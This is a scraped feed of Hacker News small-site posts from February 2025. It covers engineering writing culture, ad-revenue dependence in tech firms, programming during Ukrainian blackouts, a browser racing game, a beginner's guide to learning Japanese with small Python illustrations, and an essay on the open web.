    Once upon a time onboarding new staff was chaotic and slow. Mentoring anyone was impractical because everything was synchronous conversation. Developer outreach and marketing were distant dreams because there was nothing to begin with… you couldn't even hope to make an internal Engineering blog.

    Now staff have better tools and skills to make their work and their impact visible and legible to colleagues, decision makers, and outsiders. They derive more satisfaction from teaching each other. They are better supported in their day to day lives as knowledge workers. They have more ownership over their means of production. They tend to have higher autonomy as well as a high degree of collaboration.

    Remote work works

    Because good writing culture made asynchronous work work. See: WordPress, GitLab, 37Signals, and pretty much any well-oiled remote-first workplace.

    And guess what? With good writing culture, in-person work works even better!

    I love building software 10. I enjoy writing for it and about it. I delight in helping others do the same. Selfishly, I want the world to have more places where people like me can thrive 11.

    I've only ever worked with small obscure teams, over the last two-ish decades of professional life. Personal experience, 20/20 hindsight, and grapevine conversations have convinced me that the unreasonably effective ones had deliberately built solid cores of writing culture, for their needs. That is how they got very good at building and shipping together, succeeding through high growth and sharp downturns, all with low headcount and low attrition.

    Whether on staff or as consultant, I thrived and grew working with such teams, and narrowly avoided burning out with the others. So have many friends and colleagues.

    I have also had the opportunity and privilege to help build, sustain, and exemplify collaborative writing culture at those high-functioning places. I had the base and conviction to do so because, luckily, writing became core to my process early in my work life.

    Will it surprise you to know that I dearly want the world to have many more such high-functioning teams, where people like me can thrive?

    ]]>
    https://www.evalapply.org/posts/writing-practices-to-10x-engineering/index.html hacker-news-small-sites-43208220 Fri, 28 Feb 2025 17:35:41 GMT
    <![CDATA[The First Hit Is Free]]> thread link) | @grork
    February 28, 2025 | https://www.codevoid.net/ruminations/2025/02/23/the-first-hit-is-free.html | archive.org

    23rd February 2025, three minutes to read

    It happens to the best of us. Your company’s growth has stagnated, and your CFO is asking for new ideas on growing revenue — to increase monetization. You start out with a small experiment with ads — how bad could the impact be? It’s just a small trial. So, the product team starts looking into adding ads to your product, and the spiral begins.

    Day 0 (Experimentation)

    Look, we’ll start small. If we get feedback & DSAT (dissatisfaction) increases, we’ll pull back on them. They’re just to help offset the cost of maintaining the services that make our product so compelling. We’ll keep ads off bundle subscribers.

    Day 30 (Rationalization)

    Oh, they didn’t make much money — but that’s because they’re still learning & iterating on the targeting & right partners. That’s also why feedback says they’re annoying because they don’t feel targeted. It’ll get better.

    Day 180 (Dependence)

    Yeah, we are getting a lot of DSAT, but the ad revenue is really going well. It’s helping fund the next big feature, and the CFO loves us and is giving us more headcount to improve the core product.

    Day 365 (Tolerance)

    We know that these have tarnished some customer opinion of the product and has marginally impacted sales in the EU. But that’s been offset by the exponential growth in revenue — which is almost entirely profit, given our 85% margin!

    Day 1095 (Escalation)

    OK, so, we need to target these ads better to try to save the core business — so we can invest in it. For some reason, our sales have started to drop. We also want to focus on increasing the brand quality of the advertisers so we maintain a premium feel. But we also accept that we can’t grow on our core product, so we’re also investing in a cross-platform app, a better web app, and are working with car manufacturers to integrate our apps directly into the vehicles. They’re going to get a cut of the ad revenue. Plus, we’ll get more data access to improve our ad targeting — which we’ll also use for time- and traffic-dependent ads.

    Day 1825 (Identity Loss)

    Oh, we make apps & technology products? I thought we were an ads business.

    Seeing the Signs

    There was a rumour in Mark Gurman’s Power On Apple newsletter recently:

    Apple considers monetizing maps in another move to boost services revenue

    … Now, Apple is giving this notion more thought. In a recent all-hands meeting for the Maps group, Apple said monetizing the app is a lever it is exploring. While there is no timeline or active engineering work being done, the company has again floated the idea of charging for prioritization in search results. It also could make certain locations appear more prominently on the map …

    Under a week later, Apple announced ‘News+ Food’ to bolster its News+ subscription service. Their most recent quarterly results showed record subscription revenue driven by 14% YoY growth with 76% margins. Like so many in tech, Apple is becoming addicted to Revenue-as-a-Service (RaaS).

    There’s no way back

    RaaS feels so good — the validation from the market with a pat on the head every time the numbers go up. But there’s no way off this merry-go-round. Reduce your ads, or lower your subscriptions? The validation stops, and chaos begins. Focus on your core product? Branch out into a new non-RaaS area? You’ll never match the margins or scale of your RaaS products. You are trapped in your addiction.

    ]]>
    https://www.codevoid.net/ruminations/2025/02/23/the-first-hit-is-free.html hacker-news-small-sites-43208150 Fri, 28 Feb 2025 17:29:29 GMT
    <![CDATA[Programming in Wartime]]> thread link) | @veqq
    February 28, 2025 | https://vlnn.dev/2024-05-16-programming-in-wartime.html | archive.org

    My current hardware setup was planned during my onboarding at Apptopia (great company, BTW!) at the beginning of 2022. I decided to try MacOS for the first time in my life (I was a Linux user for ~15 years) and bought myself an M1 Macbook Pro. This was a great decision, mostly not due to the MacOS bells and whistles, but rather due to the great battery life and capable processing power, both of which carried me through the time of blackouts in late 2022. I was able to more or less use the whole stack locally, building and testing the monorepo in around 30 minutes (including all integration tests that were based on services like Cassandra, Apache Druid and Spark run in a Docker Compose infrastructure).

    I’m also using a quite big external monitor (a 34" Samsung Curved C34H890) connected to an M2 Mac Studio. This was my understanding of what an ergonomic workplace should look like for me: a standing desk, a Kinesis Advantage with custom firmware (see https://github.com/vlnn/kinesis-advantage-2), the Apple Trackpad mounted on the keyboard, etc. All this is fine and dandy except for one thing: this setup doesn’t have a battery and is shut down during power outages. After the russian shelling of pretty much all of the Ukrainian power plant infrastructure, we experienced blackouts as long as 12-18 hours per day. This disrupted my ability to work even further, sometimes limiting me to chunks of 2 hours (a good half of which was taken up by the overhead of constant household chores: getting the power station ready, the dishes clean, and the teapot hot). So: 1 hour of work with the electricity on, then an unknown timeslot of darkness and bad internet (my ISP relied too much on the usual power lines; now I have 4 independent ISP lines, one of which is cellular (i.e. it works as long as the mobile network is up — but it’s unreliable and slow) and one of which is optical (sluggish at first, requiring hardware reboots, but quite OK a year after installation — I’m actually posting this text during a blackout and have no problems with the internet at all)).

    As I had some time and resources, I ordered some power supplies (or rather power accumulators) that made our life much easier. I now have two EcoFlows: the bigger one is connected to the fridge and serves as a reserve of electricity for even worse conditions, and the smaller one powers the wifi APs and the ISPs’ routers. As I said, the desktop and monitor are fully shut down during power outages, and for now I’m OK with that: I just use my macbook.

    But there’s a slight problem: instead of working the ergonomic way at my precious standing desk, with its hilariously comfortable keyboard and big display, I’ve taught myself to work on the macbook sitting on the sofa even when the electricity is alright. Actually, I found that I’m more productive that way! Not sure how that works; I guess it’s more of a bad habit becoming second nature.

    ]]>
    https://vlnn.dev/2024-05-16-programming-in-wartime.html hacker-news-small-sites-43208132 Fri, 28 Feb 2025 17:27:25 GMT
    <![CDATA[Formula simulator racing game – A new racing simulator with realistic physics]]> thread link) | @incendies
    February 28, 2025 | https://www.gaminguides.com/game/formula-simulator-racing-game/ | archive.org

    Description

    Formula Simulator Racing Game

    Experience the thrill of high-speed racing in this immersive 3D Formula racing simulator! Race through a dynamic open world filled with challenging obstacles, collectible coins, and exciting power-ups.

    Key Features:

    Gameplay
    - Realistic car physics and handling
    - Dynamic day/night cycle
    - Interactive 3D environment with buildings and trees
    - Minimap navigation system with compass
    - Real-time multiplayer racing
    - Lives system with collision penalties

    Power-Ups
    - Super Speed Boost: Temporarily increases maximum speed
    - Shield: Provides temporary immunity from collisions
    - Super Jump: Enhanced jumping capability
    - Score Multiplier: Instant point bonus
    - Speed Reduction: Strategic obstacle for challenging gameplay

    Features
    - Global leaderboard system
    - Persistent high scores
    - Custom player names
    - Colorful car customization
    - Real-time score tracking
    - Coin collection system

    Technical Highlights
    - Built with Three.js for smooth 3D graphics
    - WebSocket integration for multiplayer functionality
    - Responsive design for various screen sizes
    - Optimized sound management system
    - Collision detection system
    - Dynamic lighting effects

    Objectives
    - Collect coins to increase your score
    - Avoid collisions with buildings and obstacles
    - Compete for the highest score on the leaderboard
    - Master the racing mechanics
    - Strategically use power-ups
    - Survive with limited lives

    Get ready to race! Enter your name, choose your car color, and compete against players from around the world in this exciting Formula racing experience!

    Instructions

    Controls
    - W or Up Arrow: Accelerate
    - S or Down Arrow: Brake/Reverse
    - A/D or Left/Right Arrows: Steering
    - Customizable sound settings

    Categories

    Multiplayer .IO 2 Player Driving


    ]]>
    https://www.gaminguides.com/game/formula-simulator-racing-game/ hacker-news-small-sites-43208068 Fri, 28 Feb 2025 17:22:29 GMT
    <![CDATA[How I’m Learning Japanese 14 Days In]]> thread link) | @ingve
    February 28, 2025 | https://wavelengths.online/posts/how-im-learning-japanese-14-days-in | archive.org

    I’ve tried to learn Japanese a few times over the years, the earliest attempt at which was some time in high school while I was watching an episode of Fullmetal Alchemist and casually looked up how long it would take.

    I quit as soon as I’d decided to start.

    Years later I was hosting a weekly recap podcast about a Japanese reality show called Terrace House with my friend and thought “it’s silly for me to be talking about this show every week without understanding any Japanese. I need to learn.”

    I — an idiot — did almost no research and didn’t ask anybody for help, which resulted in buying a textbook called Genki and downloading Duolingo. While Genki is widely used and recommended by many, I found that trying to dive headfirst into it with no assistance and no additional study materials was Decidedly Not the way I was going to learn Japanese, so I focused all of my time on Duolingo instead. My commutes to and from work each day consisted of about four total hours of train rides, which, when spent cramming as many Duolingo lessons as possible, made for a pretty solid amount of study time — though I was unaware of how poor Duolingo would be as a single tool for learning Japanese. I eventually dropped the habit as work became more and more overwhelming; spending two hours shoving a new language into my skull, then working a high-intensity job for eight (but usually more) hours, then spending two more hours in Duolingo on the way home was a really cool way to burn out.

    Fast forward to two weeks ago: my partner and I had finally decided that we’d spend our honeymoon in Japan at some point this year, and the desire to learn popped up again, this time with both of us learning simultaneously. It’s easier to stay committed to a habit when you have a buddy. I did a ton of research, consulted a few friends who learned the language in a variety of ways, and tried every method and resource I could find before landing on some tools that really do the trick.

    We’ve now both been studying for about two weeks and have made significantly more progress in those two weeks than I did in the months of daily four-hour commuting study via Duolingo years ago, so I thought as a way to share some resources and hold myself accountable I’d write up a post about how to start learning when you know literally nothing. It’s worth mentioning once again: I’m only two weeks into this. My advice may change, I may find new tools and resources, and I may bail from others. If there’s enough interest, I’ll keep this up as a series or update this post over time.

    A note: Sorry to the Android users among you, but as an iOS user some of the apps I recommend will be iOS only. I’ll link to Android versions when possible or other recommended apps if I find them.

    Step One: Learn Hiragana and Katakana

    The first part of learning Japanese is both easy and difficult in equal measure. Easy because it involves a simple step, which is to learn two of the three “alphabets” used in the language which will lay the foundation for the rest of the journey and enable you to understand and utilize more advanced study materials down the line. Difficult because it really comes down to rote memorization and repetition which can be boring or difficult to motivate yourself to do.

    For context: Hiragana and katakana are two sides of the same coin, in that they each contain 46 basic characters that represent the phonetic sounds used in spoken Japanese language. Unlike English where the letter “a” can be used to make a multitude of sounds when found within a word, the hiragana and katakana “a” — あ and ア — pretty much always make the “ah” sound as found in the word “car.” Hiragana is used for most words that originate from Japanese, while katakana is used for “loan words” or words that have been adopted into Japanese but may come from other origins. For example ステーキ is pronounced “su-te-ki” which sounds an awful lot like “steak” and in fact just means “steak” because it’s an English word adapted into Japanese. Fun!
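
    Because each kana maps to one fixed sound, transliteration really is just a table lookup. Here’s a minimal Python sketch of that idea (my own illustration, not taken from any of the apps mentioned below):

        # Tiny kana-to-romaji table: each kana has exactly one reading,
        # unlike English letters, whose sounds depend on context.
        KANA_TO_ROMAJI = {
            "あ": "a", "ア": "a",   # hiragana / katakana "ah"
            "す": "su", "ス": "su",
            "て": "te", "テ": "te",
            "き": "ki", "キ": "ki",
            "ー": "-",              # katakana long-vowel mark
        }

        def romanize(word: str) -> str:
            """Transliterate kana one character at a time."""
            return "".join(KANA_TO_ROMAJI.get(ch, ch) for ch in word)

        print(romanize("ステーキ"))  # prints "sute-ki" (the "steak" loan word)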

    This means all you need to do for step one is learn the characters and there are a lot of ways to do that depending on how quickly you want to get it done and how you learn best. Duolingo has a great tool for learning these, though the process was much too slow for me. On my end I used the following resources: 

    Learn Hiragana in One Hour

    I recommend watching this video in two thirty minute sessions and breaking out a pen and paper to write the characters down as the host introduces them. People with big brains agree: Writing helps memory. It can be overwhelming, but the mnemonic devices are extremely helpful for this early phase where characters look so wildly different from the English alphabet. It won’t take long for them to become second nature — the mnemonics fade away. Also: Make sure you repeat after Risa out loud to make sure you’re matching the intonation. As the hiragana are the most foundational element of the language learning process, any bad habits here could cause issues down the line. 

    A fun trick I’ve seen a lot of people shout out is tracing the characters with your finger on your other hand if you don’t have a pen and paper present. The order in which you draw each stroke of a character is important, so practicing any way you can is great — even if it’s just on your hand.

    Benkyō (iOS)

    Benkyō is one of a few apps by developer Romain Pellen designed to drill and memorize concepts from the Japanese language via flash cards using a spaced repetition system (SRS). SRS tools basically exist to introduce concepts, then reintroduce them at repeated intervals with the intention of burning them into your long term memory. A character you get right today will appear again in two or three days, while a character you frequently get wrong will appear more often. People Online™ are obsessed with SRS apps. While I found the setup process of Benkyō to be a bit cumbersome — some truly confusing menus in this thing — once I got the hang of it, I found myself crushing the entire hiragana chart within the first two days of study by quizzing myself with the Smart Quiz feature every chance I had. Let me be clear: That pace is not necessary. It’s all dependent on your personal goals here, and mine was to move past this foundational element within my first week if possible. 
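
    To make the SRS idea concrete, here is a minimal Leitner-style scheduler in Python (my own sketch of the general technique, not how Benkyō or any other app actually implements it): each correct answer pushes a card’s next review further out, and each miss pulls it back to the start.

        from dataclasses import dataclass, field
        from datetime import date, timedelta

        # Review intervals in days: each correct answer moves a card up a box;
        # a miss sends it back to box 0, so it shows up again tomorrow.
        INTERVALS = [1, 3, 7, 14, 30]

        @dataclass
        class Card:
            front: str               # e.g. "あ"
            back: str                # e.g. "a"
            box: int = 0
            due: date = field(default_factory=date.today)

            def review(self, correct: bool) -> None:
                # Promote on success, demote to the start on failure.
                self.box = min(self.box + 1, len(INTERVALS) - 1) if correct else 0
                self.due = date.today() + timedelta(days=INTERVALS[self.box])

        def due_today(deck: list[Card]) -> list[Card]:
            """Return the cards whose review date has arrived."""
            return [c for c in deck if c.due <= date.today()]

        deck = [Card("あ", "a"), Card("き", "ki")]
        for card in due_today(deck):
            card.review(correct=True)   # a right answer: see it again in 3 days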

    Benkyō is wonderful in that it will continue to scale up with you over time as it includes katakana, common vocabulary, and kanji — the third and most daunting written system used in Japan. Assume from here on out that I’m also using Benkyō for these things in between everything else I recommend. For the Android users among you, check out Dr. Moku.

    TokiniAndy’s Guide to Hiragana and Katakana

    This video will walk you through the katakana and the hiragana simultaneously, which is great for reinforcing what you’ve learned about hiragana while acclimating you to the katakana side of things. Thankfully, because the sounds and modifiers are almost exactly the same, learning the basic set of katakana after the entire hiragana set will allow you to intuitively suss out the more complex katakana pairings and rules — it’s a nice boon for motivation whenever you can set yourself up to say “Oh! I know this already!” Just like the above video, I recommend writing and speaking along to really hammer this stuff in before moving back to Benkyō and introducing the flash cards for katakana.

    Learning both character sets to the point where I have no trouble recognizing them took me about four days of fitting study in around podcasting and my day job and wedding planning and everything else life has to offer. That pace felt a bit breakneck to the point where I was mentally exhausted every night before bed, but worth it to jump to the next piece of the puzzle — and the one that will hypothetically take forever.

    Step Two: Draw the Rest of the Fucking Owl

    So there are about one million different ways to go from here, and because every person is different it means you’ll need to try a few different things to get going. Many people say the first step of learning Japanese is to learn how to learn Japanese, and I’d say that’s almost correct. The first step, once again, is to learn hiragana and katakana… second is learning how to learn Japanese.

    The reason things get so wild here is that people will say that you need to start learning kanji, vocab, and grammar simultaneously and it’s not not true. Learning even the most basic grammar helps make sense of sentence structure, which enables you to discern kanji and vocab words in the context of real written language. Conversely, the more kanji and vocab you learn the easier it will become to intuitively parse new grammatical rules as they’re introduced.

    While some all-in-one resources exist here, they generally cost a pretty decent chunk of cash. My first bit of advice before I get into what I’m personally using is to figure out which tools and what pace you can stick with. Take advice from 2017 daily-four-hour-Duolingo Brendon: Don’t burn out and don’t go all-in on a single resource. Building strong foundational habits here is key for long term success. I’ve only been learning Japanese in earnest for about two weeks, but I’ve been doing things like podcasting every week for years and years and the same principle applies to pretty much every long-term endeavor. This means balancing what you want to accomplish with what you need to maintain a healthy life — so rest often!! Progress is progress, and sometimes forgetting a word you thought you knew yesterday is also progress. Learning is weird! 

    Duolingo

    Surprise! I’m still using Duolingo! Look, it has its fair share of problems, but doing a Duolingo lesson or two every day is better than doing nothing and teaches a few helpful vocab words and grammar points here and there. I’ve had a few instances where my brief daily time in Duolingo actually helped me get a head start in the apps and platforms people recommend instead of Duolingo. There’s a lot of reasonable and unreasonable hate directed at Duolingo’s Japanese course these days. A lot of the prevailing negativity stems from people who tried it years ago and bounced off because it was slow, boring, and sometimes flat-out incorrect. Those early years of a sub-par lesson plan have laid the groundwork for thousands of posts writing the app off entirely sight unseen. Thankfully the Japanese course has undergone a huge overhaul in recent years, and I find myself generally enjoying it in very limited spurts.

    The biggest drawback is how little it teaches from a comprehension perspective and how brutally long it takes to move between units. Japanese is a super contextual language, meaning words and phrases will mean different things and can be shortened or elongated depending on the context of the conversation. Duolingo doesn’t really provide this outside of a “listening practice” lesson every few units. Polite forms and casual forms are mostly glossed over here, and grammar points pop up infrequently enough that you could be cruising through lessons without understanding why you’re saying the things you’re saying in the order you’re saying them. I’m not crushing four hours of lessons a day like I used to, and that’s because my time is better spent elsewhere — but that doesn’t mean Duolingo is as useless as many people online will tell you. Feel it out, but don’t rely on it.

    WaniKani via Tsurukame

    WaniKani seems to be most people’s favorite way of learning the kanji. There are something like 40,000 kanji which is horrifically daunting until you learn that most Japanese people are only taught around 2-3,000 in school for use in daily life. If you’re reading this as a native English speaker, you statistically know around 20,000-30,000 words — helpful perspective! You can learn 10% of those in another language, I believe in you.

    The closest thing to a cheat code you’ll get with kanji is that while it’s possible to brute-force memorize them the way you did with the hiragana and katakana, each kanji character is made up of smaller pieces called “radicals” which can also be learned separately. By learning the meanings of these radicals as the foundational element of your kanji journey, you’ll be able to infer the meaning of kanji over time. This is the core concept behind WaniKani, a flashcard system which teaches the radicals first before building on top of them to lead you into the 2,000 most commonly used characters and 6,000 vocabulary words over time. A friend who taught himself Japanese told me that WaniKani was the reason he “never had a problem” with kanji and I’m starting to see why. As of today I’ve been doing my WaniKani lessons and reviews daily and feel like I’m actually starting to get a handle on the learning process thanks to the way it casually layers helpful mnemonic stories atop each kanji. Just like the hiragana and katakana, you’ll see a kanji like 上 and spend the first few days reciting the mnemonic device in your head to lead you to the answer (in this case: the kanji means “above” and looks like “Joe’s toe sticking out above the ground,” so you know to pronounce it as じょう or “jo-o”), eventually you get to the point where the mnemonic identification phase disappears on a per-kanji basis.
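
    As a toy illustration of the radical idea (my own sketch; WaniKani’s actual data and mnemonics are far more elaborate), you can think of each kanji as a small composition of named parts whose meanings hint at the whole:

        # A few real decompositions, hand-picked for illustration.
        RADICALS = {"日": "sun", "月": "moon", "木": "tree"}
        KANJI = {
            "明": (["日", "月"], "bright"),          # sun + moon = bright
            "林": (["木", "木"], "grove"),           # two trees = grove
            "森": (["木", "木", "木"], "forest"),    # three trees = forest
        }

        for kanji, (parts, meaning) in KANJI.items():
            story = " + ".join(RADICALS[p] for p in parts)
            print(f"{kanji}: {story} -> {meaning}")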

    One note here is that the process takes an extremely long time as the service doles out lessons and reviews over the course of a year+ with no way to speed the process up. Every single day you’ll only be given a handful of new characters and quizzes, and while it might feel like the pace is too slow at the beginning I can already see the brilliance in how they teach their users based on the words and kanji I’ve already learned. I can tell I have a strong foundation for long-term learning based on the progress I’ve already made.

    WaniKani can be accessed via the web, but I use a third party iOS app called Tsurukame to access my lessons. Android users recommend an app called Smouldering Durtles these days. The first few levels are free which will take around a month to complete, and the service then costs $10 a month or $90 a year to access the rest. 


    BunPro

    Grammar is obviously a huge part of understanding any language, and learning Japanese while coming from English can feel wild because the structure of sentences frequently seems completely backwards. From what I’ve read, the biggest trap any prospective Japanese speaker can fall into is trying to assemble the language like a math problem, when the best way to learn for long-term success is to first become aware of the rules, then almost passively watch them play out enough that they come subconsciously while you speak and read Japanese.

    A frequently recommended resource for grammar is called Tae Kim’s Guide which is a free e-book available online, but reads very much like a textbook and requires a lot of undirected study to make your way through. BunPro on the other hand teaches similar concepts using the same SRS method as Benkyō and WaniKani, meaning each day can be spent opening your apps and learning new concepts across the spectrum of the language and reviewing old concepts as directed. 

    My experience with BunPro has been mixed so far, in that while I love learning grammar and find it legitimately interesting, I don’t love the way BunPro teaches vocab. Unfortunately, both are necessary to progress through their prebuilt course, and I frequently find myself understanding new grammatical rules immediately but getting tripped up when the app instead quizzes me on vocab I’d glossed over. My two pieces of advice are as follows:

    1. Do not neglect the vocab side of BunPro as I did; it’s not a tenable way to interact with the service — once again, I was led astray by internet strangers I shouldn’t have trusted.

    2. Go into the settings and tone down the daily new vocab words from 10 to 5. Between WaniKani, Duolingo, and some of the other study materials I’m using, adding 10 more vocab words to the mix via BunPro was the thing that would have burnt me out again.

    Anki

    Anki seems to be a religion to most people: on one hand a radiant beacon of light in the language-learning journey, and on the other a vengeful and hateful deity. Anki is an app built only for spaced repetition flash cards, though it doesn’t come with any cards at first. The app is free for Mac, PC, and web, but costs money on mobile as a one-time fee that syncs across all of your devices. I’m going to be honest here: I don’t like it. The settings are a nightmare to maneuver, the process of finding usable decks is frustrating, and the way people talk about the app is like… off-putting. There are modern-day snake oil salespeople all over the place claiming their Anki deck will get you fluent in Japanese in six months or whatever — obviously untrue. So why is it here?

    The short version is that I can see the potential of how Anki will help me in the long term. For example there are Chrome extensions which will tie into your catalogue of Anki decks and highlight words you know along with words you don’t while watching shows on Netflix or videos on YouTube, allowing you to easily create new flashcards based on the content you’re actually watching. While I’m way too early on in the process to start doing this, I thought it would be helpful to get acclimated with how Anki works via a low-lift deck that I can check in with daily. For that I’ve landed on this free deck by JLab which incorporates elements of the previously mentioned Tae Kim Guide to Japanese Grammar while also incorporating vocab and listening + comprehension practice. As an aside, the video announcing this deck has the single most positive YouTube comment section I’ve ever seen — seems like a good sign!
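
    Conceptually, those extensions boil down to comparing each subtitle line against the set of words your decks already cover. A minimal Python sketch of that idea (my own illustration, not how any particular extension actually works):

        KNOWN = {"すし", "ねこ", "みず"}   # words already in your deck

        def tag_unknown(subtitle_words: list[str]) -> list[str]:
            """Wrap words you haven't studied yet in [brackets]."""
            return [w if w in KNOWN else f"[{w}]" for w in subtitle_words]

        # Real extensions also need a tokenizer, since Japanese has no spaces;
        # here the line is pre-split for simplicity.
        print(" ".join(tag_unknown(["ねこ", "は", "みず", "を", "のむ"])))
        # -> ねこ [は] みず [を] [のむ]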

    What’s Up Next?

    Aside from using the above resources every day, I’m trying out a few things here and there to see if they’re helpful and additive tools. One important element of this is finally returning to the Genki textbook after all these years, but also pairing it with some helpful YouTube playlists to make the lessons a bit easier to parse. This one by Game Gengo is wonderful for adding helpful context to the vocab taught in the book, and this one by TokiniAndy seems solid for grammar. It’s helpful to remember that no one tool will get you to fluency, and I’ve noticed that repeating similar concepts across multiple tools is helping reinforce them.

    While I’m on the topic of Game Gengo, he also has some great recommendations for games to play at all levels and will do in-depth guides for how to play each game in Japanese. Because of him, I picked up a Japanese copy of Dragon Quest XI for Switch so I can (very) slowly make my way through one of my favorite games of all time again — this time as a tool for learning.

    On the listening side, I’ve been spending a lot of idle time while commuting or cleaning the house listening to Nihongo Con Teppei for Beginners and YuYu Japanese, two podcasts with extremely basic Japanese speech and hundreds upon hundreds of episodes in the backlog. I’ve been listening to Teppei’s first few episodes repeatedly over the past two weeks and the realization that I’m starting to understand them in bits and pieces was one of the most shocking developments over the past 14 days. 

    A few more things to shout out here before I wrap up: 

    • Human Japanese - A textbook for your phone with helpful audio by native speakers and simple quizzes as you make your way through.

    • Shashingo - A game for learning Japanese by walking around a tiny Japanese neighborhood and taking photos of objects to create flashcards. I like it!

    • Speak Japanese Naturally - A YouTube channel where someone just vlogs her day and narrates it in Japanese while pointing out objects and having casual conversations with people in daily life. 

    • Jisho - An extremely good web-based Japanese dictionary.

    • Music - It’s music! I’ve specifically been listening to a lot of city pop albums recently — a phase I get into pretty much every time I can tell winter is starting to recede and make way for spring. This time around, I’ve been spending a lot of time looking up lyrics and trying to better comprehend what’s being said instead of just letting the vocals wash over me.

    And that’s it! It’s a pretty exhaustive list, but that’s because learning a language is hard! I’m under no illusions that I’ll know how to speak by the time my honeymoon rolls around, but I am hopeful that I’ll have solid habits and a working knowledge of the most basic words needed for low-touch interactions on a daily basis. 

    Good luck to you, too. I hope this helps cut through the noise a bit.

    頑張って。

    ]]>
    https://wavelengths.online/posts/how-im-learning-japanese-14-days-in hacker-news-small-sites-43208009 Fri, 28 Feb 2025 17:18:09 GMT
    <![CDATA[The Open Web and What It Actually Means]]> thread link) | @stevedsimkins
    February 28, 2025 | https://orbiter.host/blog/the-open-web-and-what-it-actually-means/ | archive.org

    When I was in seventh grade, I took my first computers class. This was very basic, but the web was still new, still fresh and exciting. I remember pulling up the Yahoo! homepage and clicking the view source link. I copied the entire source, put it in a text editor, changed the logo and the site name to Justin!, then saved it as an index.html file. I opened that file, and to my amazement, the browser displayed my own cloned version of Yahoo.

    This is the open web.

    Later, when I launched my first non-angelfire website, I used an FTP server to upload my folder of HTML, images, and CSS. That folder was then served by a web server to the rest of the world. When the web server company I used no longer met my needs, I used FTP again to upload to a different server.

    This is the open web.

    Much later, when I was building a sports blogging business, I built my content engine around Blogger. Blogger/Blogspot was not open. It allowed you to modify the HTML within the context of their hosted user interface. I wanted more control and freedom, so I moved everything to WordPress and hosted it on a hosting provider dedicated to WordPress. WordPress is open source and portable. I had control over the code, the content, and the hosting location.

    This is the open web.

    I was working at an EdTech startup that partnered with MIT’s Media Lab to issue digital credentials on the blockchain. The idea was to ensure that credentials could live on even if an institution folded or no longer had access to old registrar records.

    This is the open web.

    I began working at Pinata, the top IPFS pinning service provider. I had learned about IPFS years before I worked at Pinata, and I became obsessed with the idea that files could be open and portable, easily moved across services and applications.

    This is the open web.

    I started Orbiter with Steve because we wanted websites that were simple, with no vendor lock-in. The web has grown too complex, and hosting simple websites and web apps requires entirely too much work and creates too much frustration, all while being increasingly closed off behind walled gardens. Orbiter was built to change that. Everything is open source. Every site is open, auditable, and accessible without any of Orbiter’s application logic. Someone can move from Orbiter to somewhere else without needing to contact us. Someone can index all the sites deployed using Orbiter and build incredible things, like a hybrid of StumbleUpon and the Wayback Machine.

    This is the open web.

    This is all anecdotal, of course. And the specific definition of the open web will vary person to person. However, the underlying theme is that the web should give you freedom. That means access, portability, and flexibility. There are some things it does not mean, though.

    The open web is not free.

    I often see and hear people talk about decentralization and open source software as if part of the definition of this openness is that it is free. That is incorrect. FOSS (free and open source software) does not mean that it is free to host and run the software. It means it’s free to be used however you would like. You don’t have to pay a licensing fee to get the software. Similarly, decentralization does not mean that there is no cost. It means that there is no central point of failure, and it is up to each participant to ensure open access and the principles of decentralization.

    Perhaps a better way to think about this is to consider the web and some of the tangential technologies. The web is decentralized. It has a standards body, but anyone can build on the web. Anyone can create services. It’s open. However, it is not free. Hosting a website can range in cost from the electricity you pay for a small server in your house to the monthly fee you pay a hosting provider.

    Email (the combined protocols that make up email, that is) is decentralized and open. It is not free. You can run an email server in your home or office, or you can pay a service to manage this at a larger scale or with more distribution and accessibility.

    Blockchain is decentralized, but it is not free. Ignoring the transaction fees that come with blockchains, participating in a blockchain network costs money. Just like with the web and email examples, you can run a blockchain node on your own by paying for the hardware and electricity costs, or you can pay a service provider that runs hosted instances.

    IPFS is decentralized but not free. Anyone who wants to can download an IPFS node and run it on their own computer. It’s actually relatively simple. However, if you want to distribute your content across the globe and make it fast, you may choose to pay a provider. This is not free. Nor is running your own node.

    Circling all the way back to the open web and web hosting, hosting is not free. The web, and the ability to host websites, is open and decentralized. However, there is always a cost. The scale of that cost is entirely up to you. Orbiter has a free plan and what we think are generous paid plans. However, you can certainly host your website for free elsewhere. The problem comes when free services are neither open nor actually free.

    Many hosting providers raise money from venture capitalists. This allows them to subsidize the cost of hosting websites with VC money. This trend has gone on for at least 15 years now. It creates a false sense that things should be free, when in reality, things are subsidized. When the subsidies end or run out, unexpected bills suddenly present themselves. A lot of times, these bills are significantly higher than if you had just been paying for a sustainable service from the start.

    The open web exists. It is decentralized, much like a lot of the other services that run parallel to and complement the web. Understanding that open does not mean free is a major step toward freeing yourself to pursue solutions that better align with what you actually want to accomplish.

    Orbiter supports the open web. Orbiter is open.

    ]]>
    https://orbiter.host/blog/the-open-web-and-what-it-actually-means/ hacker-news-small-sites-43207821 Fri, 28 Feb 2025 17:00:42 GMT
    <![CDATA[Skype Retirement Email "Important Updates to Skype Paid Services"]]> thread link) | @logicallee
    February 28, 2025 | https://taonexus.com/publicfiles/feb2025/skype-retirement-email-28-february-2025.png | archive.org

